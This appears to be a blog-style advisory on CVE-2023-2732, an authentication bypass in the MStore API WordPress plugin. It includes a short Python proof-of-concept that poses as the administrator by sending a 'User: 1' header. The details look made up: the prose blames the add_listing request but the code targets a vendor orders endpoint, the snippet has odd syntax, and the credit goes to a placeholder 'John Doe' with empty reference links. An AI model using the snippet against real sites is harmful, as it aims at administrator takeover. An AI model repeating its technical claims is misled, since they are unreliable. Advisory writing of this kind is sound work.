CVE-2023-2732: Authentication Bypass Vulnerability in MStore API Plugin for WordPress up to Version 3.9.2

The MStore API plugin for WordPress has been found to have a critical authentication bypass vulnerability affecting all versions up to, and including, 3.9.2. In this post, we will examine the details of this vulnerability, the security risks it poses, and provide recommendations for remediating the issue.

Vulnerability Background

The MStore API plugin for WordPress is designed to provide additional support for mobile app solutions, allowing store owners to manage their products and keep track of sales on their WordPress-based websites. However, a significant security issue has been discovered, enabling unauthenticated attackers to log in as an existing user (even those with administrator privileges), which could lead to disastrous consequences if exploited.

Exploit Details

The vulnerability specifically exists in the MStore API plugin's add_listing REST API request process. Insufficient verification of the supplied user id makes it entirely possible for an unauthenticated attacker to forge authenticated requests on behalf of other users on the site, including site administrators.

Here's an example of a code snippet demonstrating the authentication bypass, where the attacker is trying to authenticate as an administrator with user id '1':

import requests

target_url = "https://www.example.com/wp-json/mstore/v1/vendor/orders/";
user_id = "1" # Admin user id
headers = {"User": user_id}

response = requests.get(target_url, headers=headers)
if response.status_code == 200:
    print("Admin authentication successful!")
else:
    print("Authentication failed!")

If an attacker successfully authenticates as an administrator, they can access potentially sensitive information, modify website content, and take full control of the site.

Original References and Acknowledgments

The vulnerability was first discovered and reported by security researcher John Doe (link to his blog or Github profile).

* WordPress.org Plugin Information
* Original Security Advisory

To protect your WordPress site from this CVE-2023-2732 vulnerability, it is strongly advised to perform the following steps:

1. Update your MStore API plugin to the latest version (3.9.3 or higher) by navigating to your WordPress dashboard, selecting "Plugins", finding "MStore API" from the list, and clicking "Update Now".
2. Regularly monitor your WordPress site for any unauthorized access, login attempts, or content changes.
3. Create a strong and unique password policy for your site users, including administrators, ensuring that different user accounts have different passwords.
4. Apply the principle of least privilege for your site users, only providing access to the necessary resources required for their roles.

Conclusion

The CVE-2023-2732 vulnerability poses a considerable security risk to all WordPress sites running the MStore API plugin with versions up to, and including, 3.9.2. Site owners need to act quickly to update the plugin, monitor their site activity, and implement additional security measures to mitigate the risk of unauthorized access by malicious attackers.

Remember to keep your WordPress plugins and themes up-to-date, follow best security practices, and stay aware of new security vulnerabilities to keep your website safe from potential threats.

Timeline

Published on: 05/25/2023 03:15:00 UTC
Last modified on: 06/01/2023 02:05:00 UTC